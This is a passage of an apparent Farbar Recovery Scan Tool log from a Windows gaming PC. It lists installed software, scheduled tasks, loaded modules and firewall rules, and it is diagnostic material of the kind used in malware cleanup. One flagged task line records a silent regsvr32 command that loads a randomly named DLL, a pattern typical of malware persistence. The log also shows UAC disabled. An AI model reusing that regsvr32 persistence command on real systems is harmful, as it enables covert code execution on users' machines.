Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mount & Blade (HKLM\...\Steam App 22100) (Version: - TaleWorlds Entertainment)
Mount & Blade: Warband (HKLM\...\Steam App 48700) (Version: - TaleWorlds Entertainment)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Studio Platinum 12.0 (64-bit) (HKLM\...\{A743F12E-0A86-11E3-8F1A-F04DA23A5C58}) (Version: 12.0.1184 - Sony)
Mozilla Firefox 41.0.2 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 en-GB)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.2 - Mozilla)
Music Wars Empire (HKLM\...\Steam App 479100) (Version: - Antuan Johnson)
Norton 360 (HKLM-x32\...\N360) (Version: 22.8.1.14 - Symantec Corporation)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 375.95 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.1.2.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.1.2.31 - NVIDIA Corporation)
NVIDIA Graphics Driver 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 375.95 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.1.2.31 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 1.2.0.0 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.3.3.1921 - Electronic Arts, Inc.)
Out of the Park Baseball 15 (HKLM\...\Steam App 272670) (Version: - Out of the Park Developments)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.100.9.0 - Overwolf Ltd.)
Planet Coaster (HKLM\...\Steam App 493340) (Version: - Frontier Developments)
POSTAL 2 (HKLM\...\Steam App 223470) (Version: - Running With Scissors)
Rainbow Six Siege - Closed Beta (HKLM-x32\...\Uplay Install 1001) (Version: - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7354 - Realtek Semiconductor Corp.)
REAPER (x64) (HKLM\...\REAPER) (Version: - )
Rocket League (HKLM\...\Steam App 252950) (Version: - Psyonix, Inc.)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.0.8 - Rockstar Games)
RogueKiller version 12.8.5.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.8.5.0 - Adlice Software)
SHIELD Streaming (Version: 7.1.0340 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.1.2.31 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.2.0 - IObit)
Source SDK Base 2006 (HKLM\...\Steam App 215) (Version: - Valve)
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
Spotify (HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Spotify) (Version: 1.0.44.100.ga60c0ce1 - Spotify AB)
Star Wars - Battlefront II (HKLM-x32\...\Steam App 6060) (Version: - Pandemic Studios)
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Superb Game Boost 3.0 (HKLM-x32\...\SuperbGameBoost_is1) (Version: 3.0 - )
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TEW2013 (HKLM-x32\...\TEW2013) (Version: - )
TEW2016 (HKLM-x32\...\TEW2016) (Version: - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.22.22.1020 - Electronic Arts Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.12.1.0 - GOG.com)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Uplay Install 635) (Version: - Ubisoft Montreal)
Total Extreme Wrestling Components (HKLM-x32\...\{97CF5825-218E-4AF8-9A3E-73F031C9DF0E}) (Version: 1.00.0000 - Encore)
Total War: SHOGUN 2 (HKLM\...\Steam App 34330) (Version: - The Creative Assembly)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly)
TOXIKK (HKLM\...\Steam App 324810) (Version: - Reakktor Studios)
TunnelBear (HKLM-x32\...\{7094abcc-0311-45f4-aaac-638bf633a58a}) (Version: 2.3.22.0 - TunnelBear)
TunnelBear (x32 Version: 2.3.22.0 - TunnelBear) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
UserTesting (HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\UserTestingPlugin) (Version: - UserTesting.com)
Virtual DJ Toolbar (HKLM-x32\...\{56444A00-6A76-A76A-76A7-A758B70C2300}) (Version: 12.35.0.2436 - APN, LLC)
VirtualDJ Home FREE (HKLM-x32\...\{5E1375CB-6792-4464-8715-CC3EC83D48FA}) (Version: 7.0.5 - Atomix Productions)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Webcam Screen Recorder 7.0 (HKLM-x32\...\WCSRSetup7.0.0_is1) (Version: 7.0.0 - Web Solution Mart)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
XCOM 2 (HKLM-x32\...\Steam App 268500) (Version: - Firaxis)
Xfire (remove only) (HKLM-x32\...\Xfire) (Version: - )
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.70.118 - Zemana Ltd.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-497135639-785806308-2055428636-1005_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-997060359569}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-497135639-785806308-2055428636-1005_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00108C4A-2170-45DF-BFD2-0D498990A757} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\SymErr.exe [2016-11-12] (Symantec Corporation)
Task: {07E5E0E1-818B-4543-8127-A6BF8FEA36FB} - System32\Tasks\SuperbGameBoost => C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe [2016-05-12] (SuperBoost Software)
Task: {0B828CBA-D061-4CC7-AD31-9A3957B712C3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-11-17] (NVIDIA Corporation)
Task: {11C80439-0BF0-40BA-8C4D-9BECD1ABE79A} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\SymErr.exe [2016-11-12] (Symantec Corporation)
Task: {1A4F8009-7239-4843-B604-17831A95C44C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-11-17] (NVIDIA Corporation)
Task: {27DA9D42-D278-487B-A2A8-117AC020F7CC} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-11-17] (NVIDIA Corporation)
Task: {297A5A03-3C1E-4FDA-9D80-194B65CDCAB2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\WSCStub.exe [2016-11-12] (Symantec Corporation)
Task: {372C1541-EF56-4BD8-BB74-59308727AF9D} - System32\Tasks\Norton 360\Norton Autofix => C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\SymErr.exe [2016-11-12] (Symantec Corporation)
Task: {3EFC07DE-986F-40EF-9BA1-7F4287CEB871} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-11-17] (NVIDIA Corporation)
Task: {47056546-F4CD-4434-91F0-2C0CCF343B73} - \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task -> No File <==== ATTENTION
Task: {48C2F3C4-27DB-4B10-9F93-91F9D7F0B1DA} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {49587F9A-DD92-4476-B78C-D0C6633201E5} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {4A2084E3-C64B-4EDF-99B3-0F9596A85F1B} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2016-11-23] (Overwolf LTD)
Task: {611C823C-437B-46E7-9683-5312DFFCFD7B} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {771D9760-829B-49F4-93D2-B53E19310EE3} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)
Task: {79C9A241-E558-48FE-8929-1CFD9BE5B94F} - System32\Tasks\{7D50DE2D-8C63-E41E-4D44-FCDB07020749} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\89956195\a8be60d6.dll" <==== ATTENTION
Task: {848DCC36-520C-4946-BF68-C7EFFEFA2F84} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {99204046-3B16-47E2-AA73-80CC25938DC2} - System32\Tasks\FRAPS => C:\Fraps\fraps.exe [2015-09-05] (Beepa P/L)
Task: {D1648C99-D462-4DC6-A985-6A43CAD210C3} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-24] (Adobe Systems Incorporated)
Task: {DFE63EF4-D946-4776-81D7-8A5FF39479AA} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2016-07-22] (IObit)
Task: {E448B017-5949-44CE-8851-A1CDC78ABEDF} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-11-17] (NVIDIA Corporation)
Task: {E6010D43-6AE7-4B59-8E67-EC78FD8E8E96} - \Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler -> No File <==== ATTENTION
Task: {EA3F661E-B31C-44A9-B40C-E3D5D56149D4} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
Task: {F3E68D0B-5EF6-479A-A8C5-3F20F070478A} - \Microsoft\Windows\RemovalTools\MRT_HB -> No File <==== ATTENTION
Task: {F7C9F977-0131-4867-967A-1320F5A3FD5C} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {FAB8F02C-1876-44B4-AFBA-64A239A176AA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-11-17] (NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki/
Shortcut: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com/

ShortcutWithArgument: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\TwitchAlerts Stream Labels.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=kgmggmdngboajiakmbpdknfpdelbjbcg

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 11:42 - 2016-07-16 11:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-09 15:56 - 2016-11-11 10:10 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-08-15 15:25 - 2014-01-28 03:16 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2015-11-26 18:10 - 2015-11-26 18:10 - 00002560 _____ () C:\Windows\runservice.exe
2016-11-11 19:26 - 2016-11-17 13:45 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-11-11 19:26 - 2016-11-17 13:45 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-11-11 19:26 - 2016-11-17 13:45 - 00418752 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll
2016-02-10 12:24 - 2016-02-10 12:24 - 00039424 _____ () C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
2016-08-15 15:25 - 2016-11-17 01:03 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-12-09 15:56 - 2016-11-11 10:10 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2014-05-01 14:13 - 2016-11-13 22:39 - 00592384 _____ () C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX64.dll
2016-12-12 13:00 - 2016-12-12 13:00 - 00152944 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
2016-09-14 17:45 - 2016-09-07 04:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-09 15:55 - 2016-11-11 09:23 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-11-08 22:29 - 2016-11-02 10:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-08 22:29 - 2016-11-02 10:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-08 22:29 - 2016-11-02 10:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-08 22:29 - 2016-11-02 10:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-08 22:29 - 2016-11-02 10:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-08 22:29 - 2016-11-02 10:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-15 22:12 - 2016-09-15 22:12 - 01259520 _____ () C:\Program Files\Elgato\SoundCapture\SoundCapture.exe
2016-08-15 15:25 - 2016-12-12 14:08 - 00034960 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2016-08-15 15:25 - 2014-01-28 03:16 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2015-11-26 18:10 - 2015-11-26 18:10 - 00048640 _____ () C:\Windows\mmfs.dll
2016-08-18 13:23 - 2016-03-31 16:57 - 00625440 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2016-09-08 17:34 - 2016-12-06 20:44 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2014-04-29 15:23 - 2014-04-29 15:23 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-11-11 19:26 - 2016-11-17 13:45 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-11-11 19:26 - 2016-11-17 13:45 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-11-11 19:26 - 2016-11-17 13:45 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-11-11 19:26 - 2016-11-17 10:20 - 00506424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-11-11 19:26 - 2016-11-17 10:20 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-11-11 19:26 - 2016-11-17 10:20 - 02809912 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-11-11 19:26 - 2016-11-17 10:20 - 00245184 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-11-11 19:26 - 2016-11-17 10:20 - 00436792 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-11-11 19:26 - 2016-11-17 10:20 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-11-11 19:26 - 2016-11-17 10:20 - 00968248 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2015-09-10 16:32 - 2016-09-08 03:14 - 00784672 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-09-10 16:32 - 2016-09-01 01:02 - 04969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-09-10 16:32 - 2016-10-13 01:58 - 02321696 _____ () C:\Program Files (x86)\Steam\video.dll
2015-09-10 16:32 - 2016-01-27 07:49 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-09-10 16:32 - 2016-01-27 07:49 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-09-10 16:32 - 2016-01-27 07:49 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-09-10 16:32 - 2016-01-27 07:49 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-09-10 16:32 - 2016-01-27 07:49 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-09-10 16:32 - 2016-09-01 01:02 - 01563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-09-10 16:32 - 2016-09-01 01:02 - 01195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-09-10 16:32 - 2016-10-13 01:58 - 00836896 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-09 16:48 - 2016-07-04 22:17 - 00266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2016-11-11 19:26 - 2016-11-17 13:44 - 60817344 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-15 10:40 - 2016-08-04 20:56 - 49825056 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.winxp\libcef.dll
2016-03-04 22:18 - 2016-01-11 14:38 - 01435240 _____ () C:\Program Files\CyberGhost 5\Geckofx-Core.dll
2016-11-15 20:30 - 2016-11-08 20:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libglesv2.dll
2016-11-15 20:30 - 2016-11-08 20:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libegl.dll
2015-09-10 16:32 - 2015-09-24 23:52 - 00119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2016-11-08 20:44 - 2016-11-08 20:44 - 17772736 _____ () C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.207\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 11:04 - 2016-12-12 13:03 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-497135639-785806308-2055428636-1005\Control Panel\Desktop\\Wallpaper -> C:\Users\Nathan\Pictures\Saved Pictures\owlsa-Facebook-share-image.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [{F21D9DD7-84DC-4305-AEBF-55CEC5FC3908}] => C:\Program Files (x86)\OSTotoSoft\DriverTalent\download\MiniThunderPlatform.exe
FirewallRules: [{AACF3A97-A62D-4D57-96EA-51570A8A5C8F}] => C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe
FirewallRules: [{ECC4BF3C-C58C-49DF-9247-C59268B59109}] => C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe
FirewallRules: [{1F930B05-5AD8-4DCC-9910-563871466CB9}] => C:\Program Files (x86)\Steam\steamapps\common\Hearts of Iron IV\hoi4.exe
FirewallRules: [{CAB66E9A-471C-4362-B0B6-B1347B83EAA7}] => C:\Program Files (x86)\Steam\steamapps\common\Hearts of Iron IV\hoi4.exe
FirewallRules: [{3511A213-4F4D-4C94-A7FA-4D18625AE158}] => C:\Program Files (x86)\Steam\steamapps\common\Mount and Blade\runme.exe
FirewallRules: [{476F629A-34BB-4B7E-BB27-CBC977136CCF}] => C:\Program Files (x86)\Steam\steamapps\common\Mount and Blade\runme.exe
FirewallRules: [{060070AE-35B5-4973-A9DF-BA9C304B531C}] => C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\mb_warband.exe
FirewallRules: [{2022308E-6B27-40D7-B51C-BA39544F2D52}] => C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\mb_warband.exe
